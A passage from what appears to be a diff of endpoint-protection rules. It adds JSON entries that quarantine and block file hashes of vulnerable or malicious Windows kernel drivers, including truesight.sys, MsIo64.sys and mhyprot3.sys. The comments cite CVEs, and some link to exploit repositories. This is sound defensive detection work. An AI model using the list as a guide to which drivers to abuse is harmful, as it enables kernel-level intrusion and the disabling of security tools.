"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cfb7af8ac67a379e7869289aeee21837c448ea6f8ab6c93988e7aa423653bd40", + "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "79fbe06e-e59b-566f-b9cc-b21f65750e9d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.830517Z", + "creation_date": "2026-03-23T11:45:31.830519Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.830524Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9165d4f3036919a96b86d24b64d75d692802c7513f2b3054b20be40c212240a5", + "comment": "Vulnerable Rentdrv2 Driver (aka rentdrv2_x32.sys and rentdrv_x64.sys) [https://github.com/keowu/BadRentdrv2, https://unit42.paloaltonetworks.com/agonizing-serpens-targets-israeli-tech-higher-ed-sectors/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "79fd5c59-21fa-5d10-aa23-d747f2cf98b0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.497781Z", + "creation_date": "2026-03-23T11:45:31.497784Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.497793Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "607eeb68431468850b48f805deedd5d28c9f46db4f830f7478f583ce00104c1d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "79fd87d2-d887-522e-b7f5-ceb2188cbf48", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160082Z", + "creation_date": "2026-03-23T11:45:31.160084Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160090Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "622a4e536379a8ce8b2952d62e648ed38a5a4671073d135cfd845d1e6c2dbe32", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7a139dcf-c09d-5828-b8b7-1d635b6e9d6a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811257Z", + "creation_date": 
"2026-03-23T11:45:31.811259Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811264Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "52f99c59a2b6435be245ef03c7df4567e414791f4eb85e42b89c9a884fba3a1f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7a22d28d-ab8e-5f10-897d-d54e7f1eec70", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831163Z", + "creation_date": "2026-03-23T11:45:30.831165Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831170Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "74676ad031b03d26fac1425c1328262abed379ded73983efccea71668058633c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "7a235aae-3d58-50ac-8237-cf29539344cf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.830411Z", + "creation_date": "2026-03-23T11:45:31.830413Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.830418Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c60f7f3d1a2ffb80baee5f29cc13b435162f15b21c5d643276f1a9d2dde83b03", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7a433bab-94d6-59e5-b664-cb5c67d248d8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827293Z", + "creation_date": "2026-03-23T11:45:31.827295Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + 
"hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827301Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a6b7001bad1770540f04ccd63933e231d9f4739d61bf2cc2c6a5080f954f9296", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7a46c618-76aa-59cf-9fe5-568e708df909", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820248Z", + "creation_date": "2026-03-23T11:45:30.820250Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820256Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cec5964d7e32c52439d5eb660fa97827b619a7da9f3264f0c9fa4b69e3cb7cc1", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7a4a17d4-8003-5f15-b448-a344e42ba920", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614161Z", + "creation_date": "2026-03-23T11:45:29.614163Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614168Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2270a8144dabaf159c2888519b11b61e5e13acdaa997820c09798137bded3dd6", + "comment": "MICSYS Technology driver (aka MsIo64.sys) [CVE-2019-18845] [https://github.com/kkent030315/MsIoExploit] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7a7c4c2f-ae12-566a-95ae-7b4d8f316613", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.815509Z", + "creation_date": "2026-03-23T11:45:31.815511Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.815516Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"f118bf09da64c4e9e5ed719cb23bde8f7b689c9ee32522f936c86f9d12ccdf64", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7a87140d-b469-54cb-90cf-626ccdd71509", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622474Z", + "creation_date": "2026-03-23T11:45:29.622476Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622481Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7dfc2eb033d2e090540860b8853036f40736d02bd22099ff6cf665a90be659cd", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7a9c31a7-a09c-5135-8aa1-1f2af39446e9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.458494Z", + "creation_date": "2026-03-23T11:45:30.458497Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.458505Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4c21b7065cb961127ab9e2a0251ab8d50cfd65369a41e88e36bc2908af2b1d8d", + "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7aac41e8-e037-55f1-9603-a098eb1db07d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985915Z", + "creation_date": "2026-03-23T11:45:29.985918Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985923Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "82b0e1d7a27b67f0e6dc39dc41e880bdaef5d1f69fcec38e08da2ed78e805ef9", + "comment": "Malicious Kernel Driver related to RedDriver (aka telephonuAfY.sys, spwizimgVT.sys, 834761775.sys, reddriver.sys, typelibdE.sys, 
NlsLexicons0024UvN.sys and ktmutil7ODM.sys) [https://blog.talosintelligence.com/undocumented-reddriver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7ab3fe55-b159-54b1-b78b-d458de4410cc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.476532Z", + "creation_date": "2026-03-23T11:45:31.476536Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.476546Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "580560d9a5e1122524037da3faaedc5590ee08ad64a0134dcf735cd1d4754c0d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7ac080d9-e10f-5e4d-bba2-d81891018bf9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976101Z", 
+ "creation_date": "2026-03-23T11:45:29.976103Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976108Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "09934191a9af0ab2fb1dd47a1d0e0c7c3537b53286828ffaf361d0eeac045ccb", + "comment": "SystemInformer driver (aka systeminformer.sys, formerly known as kprocesshacker.sys) [https://github.com/winsiderss/systeminformer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7ac9ceff-40fd-5cff-8673-32431232cc31", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980900Z", + "creation_date": "2026-03-23T11:45:29.980902Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980907Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c8ff7c9f510f7a2ed88d9b336d8c9339698d5e1ee14bfb91aa89703ec06dce42", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7ad00c41-a229-591d-8c96-181726e4d1cb", + "test_maturity_current_count": 
0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984858Z", + "creation_date": "2026-03-23T11:45:29.984860Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984866Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0040153302b88bee27eb4f1eca6855039e1a057370f5e8c615724fa5215bada3", + "comment": "Dangerous Physmem Kernel Driver (aka BS_Def64.Sys) [https://www.loldrivers.io/drivers/4a80da66-f8f1-4af9-ba56-696cfe6c1e10/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7ad1aac4-dfb5-5d05-a172-0ff4f1097783", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143576Z", + "creation_date": "2026-03-23T11:45:32.143578Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143584Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": 
null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f8d45fa03f56e2ea14920b902856666b8d44f1f1b16644baf8c1ae9a61851fb6", + "comment": "Vulnerable Kernel Driver (aka DcProtect.sys) [https://www.loldrivers.io/drivers/7cee2ce8-7881-4a9a-bb18-61587c95f4a2/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7ad1d438-bddc-5c68-9a7b-aab0db6f0994", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146154Z", + "creation_date": "2026-03-23T11:45:32.146157Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146162Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "65205e494d01e07c27da9a623ee5edad33dbcedc755ef5155b19cb2e908cf185", + "comment": "Malicious Kernel Driver (aka driver_a6deeea6.sys) [https://www.loldrivers.io/drivers/f694c0e1-b75d-4c41-acbd-a87b72d8abe4/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7ad2d8b8-faf4-5dd8-816b-d36d4cf3c534", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": 
{ + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.485071Z", + "creation_date": "2026-03-23T11:45:31.485074Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.485084Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "193bcdc0b0107f36cb04123b1f0775905b5f632b5dd1efcddfbc3ebb53953f7c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7ad771c4-5e40-5093-8c05-59f0142279bc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621703Z", + "creation_date": "2026-03-23T11:45:29.621705Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621711Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "506f953bbb285aeb8af0549eb24f52f3b7af36afe740afa36735bac70573ce28", + "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) 
[https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7ae5948e-9aac-507b-a2f9-ac56fc445743", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820320Z", + "creation_date": "2026-03-23T11:45:30.820322Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820327Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ff322cd0cc30976f9dbdb7a3681529aeab0de7b7f5c5763362b02c15da9657a1", + "comment": "Vulnerable Kernel Driver (aka rtport.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7af5594d-4d91-580a-a1e6-5b5984bef814", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612249Z", + "creation_date": "2026-03-23T11:45:29.612251Z", + "enabled": true, + "block_on_agent": true, + 
"quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612256Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "aac86a3143de3e18dea6eab813b285da0718e9fb6bc0bbb46c6e7638476061d8", + "comment": "Vulnerable Kernel Driver (aka mhyprot3.sys) [https://www.loldrivers.io/drivers/2aa003cd-5f36-46a6-ae3d-f5afc2c8baa3/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7b04bc1c-8ffe-5005-8c15-126167301243", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819655Z", + "creation_date": "2026-03-23T11:45:30.819657Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819663Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b2364c3cf230648dad30952701aef90acfc9891541c7e154e30c9750da213ed1", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7b1b0d08-d4b7-532a-8718-493cb90ab7c0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
